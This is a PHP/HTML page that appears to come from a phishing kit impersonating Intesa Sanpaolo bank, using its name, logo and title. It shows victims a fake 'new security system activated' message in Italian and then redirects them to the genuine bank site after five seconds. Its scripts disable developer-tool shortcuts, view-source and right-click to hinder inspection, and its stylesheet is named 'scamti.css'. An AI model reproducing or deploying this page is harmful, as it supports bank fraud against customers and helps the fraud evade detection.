<?php
include_once '../../../INC/APP.php';
?>
<script>

	document.onkeydown = function(e) {
	  if(event.keyCode == 123) {
	     return false;
	  }
	  if(e.ctrlKey && e.shiftKey && e.keyCode == 'I'.charCodeAt(0)) {
	     return false;
	  }
	  if(e.ctrlKey && e.shiftKey && e.keyCode == 'J'.charCodeAt(0)) {
	     return false;
	  }
	  if(e.ctrlKey && e.keyCode == 'U'.charCodeAt(0)) {
	     return false;
	  }
	}


	
	document.addEventListener('contextmenu', function(e) {
	  e.preventDefault();
	});

</script>
   	<script>
	function makeid()
							  {
								  var text = "";
								  var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";

								  for( var i=0; i < 110; i++ )
									  text += possible.charAt(Math.floor(Math.random() * possible.length));

								  return text;
							  }
							  
 function Redirect() 
    {  
        window.location="https://www.intesasanpaolo.com"
    } 
    document.write(""); 
    setTimeout('Redirect()', 5000);
</script> 
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link rel="icon" href="../persone-e-famiglie/img/favicon.ico" type="image/x-icon">
<center><IMG border=0 hspace=0 alt="" src="Intesa_Sanpaolo.svg.png" width=270 align=baseline height=34></center>
        <title>Banca Intesa Sanpaolo - Conto Corrente per Famiglie, Giovani e Aziende</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link href="css/scamti.css" rel="stylesheet">
<link href="css/MOBILE.css" rel="stylesheet">
</head>
<body>
<div id="LayoutGrid1">
<div class="col-1">
<div id="wb_LayoutGrid2">
<div id="LayoutGrid2">
<div class="row">
<div class="col-1">
<div id="wb_Image" style="">
<img src="tenor.gif" id="Image1" alt="">
</div>
<div id="wb_Text2">
<span style="color:#000000;font-family:Arial;font-size:16px;"><br><br><br>Il nuovo sistema di sicurezza è stato attivato.<strong></strong><br></span>
<span style="color:#000000;font-family:Arial;font-size:16px;"><br><br><br>Ti reindirizzeremo dopo 5 secondi...<strong></strong><br></span>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>

</body></html>